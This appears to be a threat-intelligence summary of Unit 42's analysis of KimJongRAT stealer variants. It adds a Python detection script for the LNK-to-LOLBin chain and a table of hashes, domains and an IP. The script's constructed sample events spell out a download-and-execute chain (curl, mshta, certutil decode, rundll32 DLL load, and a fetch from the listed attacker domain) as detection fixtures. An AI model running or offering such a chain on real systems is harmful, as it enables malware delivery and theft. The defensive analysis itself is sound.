Exploring a New KimJongRAT Stealer Variant and Its PowerShell Implementation

2025-06-17 Palo Alto Networks (Unit 42)

https://unit42.paloaltonetworks.com/kimjongrat-stealer-variant-powershell/


Unit 42 analyzes two new KimJongRAT stealer variants, one PE-based and one PowerShell-based. Both start from a Windows LNK file that retrieves a dropper from attacker-controlled content hosted on a legitimate CDN service.

The PE chain relies on living-off-the-land binaries (cmd.exe, curl.exe, mshta.exe, certutil.exe, and rundll32.exe) to download an HTA file; drop a decoy PDF, user.txt, and the sys.dll loader; and then fetch two RC4-encrypted payloads named net64.log and main64.log. The loader decrypts and runs the stealer and orchestrator components. The orchestrator handles C2 communication, backdoor functionality, victim identification, keylogging, clipboard capture, and the handling of stolen data.

Both variants collect victim and browser data, including cryptocurrency-wallet extension data. The PE variant additionally collects FTP and email client information, while the PowerShell variant deploys separate stealer and keylogger scripts.
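As an added example (not code from the Unit 42 report or from Palo Alto Networks), the following Python script turns the PE chain described above into a detection over process-creation events: it walks each cmd.exe process tree, counts how many of the living-off-the-land binaries the chain uses appear beneath it, and checks command lines for the stage file names and the network IOCs listed on this page. The sample events, the user paths, and the cdn.example host are constructed for illustration; in practice the events would come from Sysmon Event ID 1 or an EDR process feed.

```python
"""Flag the LNK -> cmd.exe -> curl/mshta/certutil/rundll32 chain in process-creation events.

Added example. The events below are constructed (loosely modelled on Sysmon Event ID 1
fields), not telemetry from the Unit 42 report; cdn.example is a placeholder host.
"""
import re
from collections import defaultdict

# Network IOCs listed on this page.
IOC_DOMAINS = {"secservice.ddns.net", "srvdown.ddns.net"}
IOC_IPS = {"131.153.13.235"}
# Living-off-the-land binaries the PE chain uses.
CHAIN_BINARIES = {"cmd.exe", "curl.exe", "mshta.exe", "certutil.exe", "rundll32.exe"}
# Stage file names the report describes.
STAGE_FILES = {"user.txt", "sys.dll", "net64.log", "main64.log"}
# Directories an unprivileged user can write to; a DLL loaded from here is suspicious.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Public|Downloads)\\", re.I)

TMP = r"C:\Users\u\AppData\Local\Temp"      # constructed path
APP = r"C:\Users\u\AppData\Roaming"         # constructed path
SAMPLE_EVENTS = [  # constructed sample, one malicious tree and one benign tree
    {"pid": 1000, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    # LNK double-clicked in Explorer starts the chain
    {"pid": 2000, "ppid": 1000, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": rf'cmd.exe /q /c curl.exe -o "{TMP}\doc.hta" https://cdn.example/doc.hta & mshta.exe "{TMP}\doc.hta"'},
    {"pid": 2001, "ppid": 2000, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": rf'curl.exe -o "{TMP}\doc.hta" https://cdn.example/doc.hta'},
    {"pid": 2002, "ppid": 2000, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": rf'mshta.exe "{TMP}\doc.hta"'},
    {"pid": 2003, "ppid": 2002, "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": rf'certutil.exe -decode "{TMP}\user.txt" "{APP}\sys.dll"'},
    {"pid": 2004, "ppid": 2002, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": rf'rundll32.exe "{APP}\sys.dll",#1'},
    {"pid": 2005, "ppid": 2004, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": rf'curl.exe -o "{APP}\net64.log" http://srvdown.ddns.net/net64.log'},
    # benign: a script fetching a report with curl
    {"pid": 3000, "ppid": 1000, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c curl.exe -o report.json https://example.com/report.json"},
    {"pid": 3001, "ppid": 3000, "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe -o report.json https://example.com/report.json"},
]


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def event_indicators(ev):
    """Per-event signals for one process-creation event; each entry is a readable reason."""
    img, cl = basename(ev["image"]), ev["cmdline"]
    low = cl.lower()
    hits = []
    if img == "curl.exe" and re.search(r"https?://", low):
        hits.append("curl.exe downloading from the network")
    if img == "mshta.exe" and (".hta" in low or "http" in low):
        hits.append("mshta.exe executing an HTA")
    if img == "certutil.exe" and ("-decode" in low or "-urlcache" in low):
        hits.append("certutil.exe used to decode or fetch a file")
    if img == "rundll32.exe" and USER_WRITABLE.search(cl):
        hits.append("rundll32.exe loading a DLL from a user-writable path")
    hits += [f"stage file name {n}" for n in sorted(STAGE_FILES) if n in low]
    hits += [f"IOC domain {d}" for d in sorted(IOC_DOMAINS) if d in low]
    hits += [f"IOC IP {ip}" for ip in sorted(IOC_IPS) if ip in low]
    return hits


def find_chains(events, min_lolbins=3):
    """Alert on every cmd.exe tree that uses >= min_lolbins chain binaries or touches an IOC."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e["pid"])
    alerts = []
    for root in events:
        if basename(root["image"]) != "cmd.exe":
            continue
        tree, stack = [root], list(children[root["pid"]])
        while stack:                      # collect all descendants of this cmd.exe
            pid = stack.pop()
            tree.append(by_pid[pid])
            stack.extend(children[pid])
        lolbins = {basename(e["image"]) for e in tree} & CHAIN_BINARIES
        reasons = [r for e in tree for r in event_indicators(e)]
        if len(lolbins) >= min_lolbins or any(r.startswith("IOC ") for r in reasons):
            parent = by_pid.get(root["ppid"])
            alerts.append({
                "root_pid": root["pid"],
                "launched_by": basename(parent["image"]) if parent else None,
                "lolbins": sorted(lolbins),
                "reasons": reasons,
            })
    return alerts


if __name__ == "__main__":
    for a in find_chains(SAMPLE_EVENTS):
        print(f"cmd.exe pid {a['root_pid']} launched by {a['launched_by']}: {a['lolbins']}")
        for r in a["reasons"]:
            print("  -", r)
```

The tree-level threshold is what keeps this from firing on ordinary curl or certutil use: a single curl download under cmd.exe stays quiet, while three or more of the chain's binaries under one cmd.exe, or any command line naming a listed IOC, produces an alert with the reasons attached. The benign tree in the sample is there to show that distinction.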

Indicators of Compromise

Type  Value (hashes truncated as displayed)  First Seen  Last Seen
HASH 4b87b775cdb265ecd872a71be810d78… 2025-06-17 2025-06-17
HASH 8a000aa43c17250dd02f842bc2ab37e… 2025-06-17 2025-06-17
HASH 3c2ea04090ad8c28116c42a9a2be5b2… 2025-06-17 2025-06-17
HASH eb68ed54e543c18070e5cc93a27db4a… 2025-06-17 2025-06-17
HASH 2ba3397cba28af1a929403910035b78… 2025-06-17 2025-06-17
HASH 9e4e45e8f12db94997767bd3899968b… 2025-06-17 2025-06-17
HASH 5a18a29791cfb18767a43bebb61f923… 2025-06-17 2025-06-17
HASH 9c9136fc8a279ce395997dd42c075e2… 2025-06-17 2025-06-17
HASH 945e4f78196ef3a5548996a8d09e422… 2025-06-17 2025-06-17
HASH bcdc99e0f17486aa5a5faa0b9e7d7cc… 2025-06-17 2025-06-17
HASH f4d9547269e0cd7a0df97e394f688e0… 2025-06-17 2025-06-17
HASH 3b0a3bd5b790e5f130e7819550613b7… 2025-06-17 2025-06-17
HASH 97d1bd607b4dc00c356dd873cd4ac30… 2025-06-17 2025-06-17
HASH ab8862628584aa429fe7614d1c674bb… 2025-06-17 2025-06-17
HASH 5097553dff2a2da4f16b80a346fe543… 2025-06-17 2025-06-17
HASH b7dad38a099947612fcc42c50f4ba17… 2025-06-17 2025-06-17
HASH 4e45009f5b582ca404b197d28805e36… 2025-06-17 2025-06-17
HASH f73164bd4d2a475f79fb7d0806cfc3d… 2025-06-17 2025-06-17
HASH c356cd9fea07353a0ee4dfd4652bf79… 2025-06-17 2025-06-17
HASH 3c6476411d214d40d0cc43241f63e93… 2025-06-17 2025-06-17
HASH 8b0b62a31b348c5a2337ee69cfd3f68… 2025-06-17 2025-06-17
HASH ef0ce406fa722d30bfa094c660e81ed… 2025-06-17 2025-06-17
HASH bdb272189a7cdcf166fce130d58b794… 2025-06-17 2025-06-17
HASH d92b858d691c84b4e3752fdd46b5673… 2025-06-17 2025-06-17
HASH 85be5cc01f0e0127a26dceba76571a9… 2025-06-17 2025-06-17
HASH 7a37e2d6dc941386d1f300bac480560… 2025-06-17 2025-06-17
HASH 02783530bbd8416ebc82ab1eb5bbe81… 2025-06-17 2025-06-17
HASH 96df4f9cb5d9cacd6e3b947c61af9b8… 2025-06-17 2025-06-17
HASH accf50d769408253bf9a7da378228de… 2025-06-17 2025-06-17
HASH 9bfbf7618a2c5270d552f4deb69b560… 2025-06-17 2025-06-17
HASH b103190c647ddd7d16766ee5af19e26… 2025-06-17 2025-06-17
HASH be080777332ad1186fb8547a6a354b2… 2025-06-17 2025-06-17
HASH 45980cc8afb4e1b3738130d0855bb60… 2025-06-17 2025-06-17
HASH d7a61ab1b1eadd3b34386ec2a963241… 2025-06-17 2025-06-17
HASH 7a9f4ca13aed4d6d8ba430bc2b2f5ac… 2025-06-17 2025-06-17
HASH b90b2d992b41d146e70b775e2bc0430… 2025-06-17 2025-06-17
HASH 6347d70b73e1cabadf8af8602b22a82… 2025-06-17 2025-06-17
HASH 3589c871b56cf76ce28c6be914b206a… 2025-06-17 2025-06-17
DOMAIN secservice.ddns.net 2025-06-17 2025-06-17
IPv4 131.153.13.235 2025-06-17 2025-06-17
HASH 28f2fcece68822c38e72310c911ef00… 2025-04-04 2025-06-17
DOMAIN srvdown.ddns.net 2025-04-04 2025-06-17
HASH a66c25b1f0dea6e06a4c9f8c5f6ebba… 2025-03-28 2025-06-17
